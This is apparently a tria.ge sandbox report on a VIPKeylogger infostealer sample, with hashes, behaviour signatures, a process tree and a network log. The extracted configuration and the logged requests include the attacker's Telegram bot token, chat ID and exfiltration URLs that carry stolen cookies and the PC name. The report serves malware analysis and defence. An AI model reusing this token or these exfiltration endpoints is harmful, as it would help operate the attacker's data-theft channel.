Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

10/10/2024, 02:19 UTC

241010-crx4sazhnm 10

Analysis

  • max time kernel
    104s
  • max time network
    137s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10/10/2024, 02:19 UTC

General

  • Target

    Samples - 10-09-2024/45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe

  • Size

    1.0MB

  • MD5

    d96552352f1a07f3a15a7edeac9158fa

  • SHA1

    874467ad9048f02dfcebc2415391f93854dfeeb6

  • SHA256

    45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56

  • SHA512

    eac4080aa9eac27327abecff4c1c2a6c92d1a573a3df1bdc10d2f6f3c39e96705911ec8c02245cb50bc59da5bb549025d7577bb10a66b2717f390b17d394c3fc

  • SSDEEP

    24576:54lavt0LkLL9IMixoEgeaP6npT4Tl7zo7RG9kq9MmCS:Ikwkn9IMHeaPe5+7zARDaPCS

Malware Config

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendMessage?chat_id=5916042829

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Samples - 10-09-2024\45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe
    "C:\Users\Admin\AppData\Local\Temp\Samples - 10-09-2024\45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5352
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\Samples - 10-09-2024\45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:3896
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 824
      2⤵
      • Program crash
      PID:2472
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 5352 -ip 5352
    1⤵
      PID:2236

    Network

    • flag-us
      DNS
      checkip.dyndns.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      checkip.dyndns.org
      IN A
      Response
      checkip.dyndns.org
      IN CNAME
      checkip.dyndns.com
      checkip.dyndns.com
      IN A
      158.101.44.242
      checkip.dyndns.com
      IN A
      193.122.6.168
      checkip.dyndns.com
      IN A
      193.122.130.0
      checkip.dyndns.com
      IN A
      132.226.8.169
      checkip.dyndns.com
      IN A
      132.226.247.73
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      reallyfreegeoip.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      reallyfreegeoip.org
      IN A
      Response
      reallyfreegeoip.org
      IN A
      104.21.67.152
      reallyfreegeoip.org
      IN A
      172.67.177.134
    • flag-us
      DNS
      242.44.101.158.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      242.44.101.158.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      152.67.21.104.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      152.67.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      api.telegram.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-us
      DNS
      220.167.154.149.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      220.167.154.149.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      nexusrules.officeapps.live.com
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      nexusrules.officeapps.live.com
      IN A
      Response
      nexusrules.officeapps.live.com
      IN CNAME
      prod.nexusrules.live.com.akadns.net
      prod.nexusrules.live.com.akadns.net
      IN A
      52.111.243.29
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:08 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 2be46430163eaa2ec46e402c6f4134e8
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:08 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 3d3fe80d2bc780ca99c6091e9ba27805
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: e585546f3f27b4e4d2c642b50ade23ba
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 041eb62e5b214f8df3981bc6440afa86
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 618067b1881670aa1411710e06b83f6c
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: ae2124d1753c5468dd24a1d0e3e5f227
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: a663d07424aefb9adfb0fcdc234f6e9f
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: b62a37eab0353041ba3cea8d22fa27fb
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: f1591218eefc9149cecb8fee37d81d84
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 1b3f811ffa1043e14b3c9ae880ed74c7
    • flag-nl
      GET
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:FEBLIQTI%0D%0ADate%20and%20Time:%2010/10/2024%20/%202:27:56%20AM%0D%0ACountry%20Name:%20%0D%0A%5B%20FEBLIQTI%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
      RegSvcs.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:FEBLIQTI%0D%0ADate%20and%20Time:%2010/10/2024%20/%202:27:56%20AM%0D%0ACountry%20Name:%20%0D%0A%5B%20FEBLIQTI%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
      Host: api.telegram.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Server: nginx/1.18.0
      Date: Thu, 10 Oct 2024 02:28:11 GMT
      Content-Type: application/json
      Content-Length: 55
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      POST
      https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery
      RegSvcs.exe
      Remote address:
      149.154.167.220:443
      Request
      POST /bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery HTTP/1.1
      Content-Type: multipart/form-data; boundary=------------------------8dce8d32a2ae3e2
      Host: api.telegram.org
      Content-Length: 930
      Response
      HTTP/1.1 401 Unauthorized
      Server: nginx/1.18.0
      Date: Thu, 10 Oct 2024 02:28:18 GMT
      Content-Type: application/json
      Content-Length: 58
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • 158.101.44.242:80
      http://checkip.dyndns.org/
      http
      RegSvcs.exe
      2.3kB
      3.8kB
      23
      14

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200
    • 104.21.67.152:443
      reallyfreegeoip.org
      tls
      RegSvcs.exe
      2.2kB
      14.0kB
      25
      25
    • 149.154.167.220:443
      https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery
      tls, http
      RegSvcs.exe
      2.6kB
      7.2kB
      14
      14

      HTTP Request

      GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:FEBLIQTI%0D%0ADate%20and%20Time:%2010/10/2024%20/%202:27:56%20AM%0D%0ACountry%20Name:%20%0D%0A%5B%20FEBLIQTI%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

      HTTP Response

      404

      HTTP Request

      POST https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery

      HTTP Response

      401
    • 8.8.8.8:53
      checkip.dyndns.org
      dns
      RegSvcs.exe
      624 B
      1.2kB
      9
      9

      DNS Request

      checkip.dyndns.org

      DNS Response

      158.101.44.242
      193.122.6.168
      193.122.130.0
      132.226.8.169
      132.226.247.73

      DNS Request

      8.8.8.8.in-addr.arpa

      DNS Request

      reallyfreegeoip.org

      DNS Response

      104.21.67.152
      172.67.177.134

      DNS Request

      242.44.101.158.in-addr.arpa

      DNS Request

      152.67.21.104.in-addr.arpa

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

      DNS Request

      220.167.154.149.in-addr.arpa

      DNS Request

      nexusrules.officeapps.live.com

      DNS Response

      52.111.243.29

      DNS Request

      29.243.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3896-12-0x0000000006830000-0x00000000069F2000-memory.dmp

      Filesize

      1.8MB

    • memory/3896-7-0x0000000000400000-0x000000000044A000-memory.dmp

      Filesize

      296KB

    • memory/3896-8-0x000000007334E000-0x000000007334F000-memory.dmp

      Filesize

      4KB

    • memory/3896-9-0x0000000005BB0000-0x0000000006156000-memory.dmp

      Filesize

      5.6MB

    • memory/3896-10-0x00000000054D0000-0x000000000556C000-memory.dmp

      Filesize

      624KB

    • memory/3896-11-0x0000000073340000-0x0000000073AF1000-memory.dmp

      Filesize

      7.7MB

    • memory/3896-13-0x00000000066D0000-0x0000000006720000-memory.dmp

      Filesize

      320KB

    • memory/3896-14-0x0000000006F30000-0x000000000745C000-memory.dmp

      Filesize

      5.2MB

    • memory/3896-15-0x000000007334E000-0x000000007334F000-memory.dmp

      Filesize

      4KB

    • memory/3896-16-0x0000000073340000-0x0000000073AF1000-memory.dmp

      Filesize

      7.7MB

    • memory/3896-17-0x0000000006AA0000-0x0000000006B32000-memory.dmp

      Filesize

      584KB

    • memory/3896-18-0x0000000006A00000-0x0000000006A0A000-memory.dmp

      Filesize

      40KB

    • memory/5352-6-0x0000000001330000-0x0000000001730000-memory.dmp

      Filesize

      4.0MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.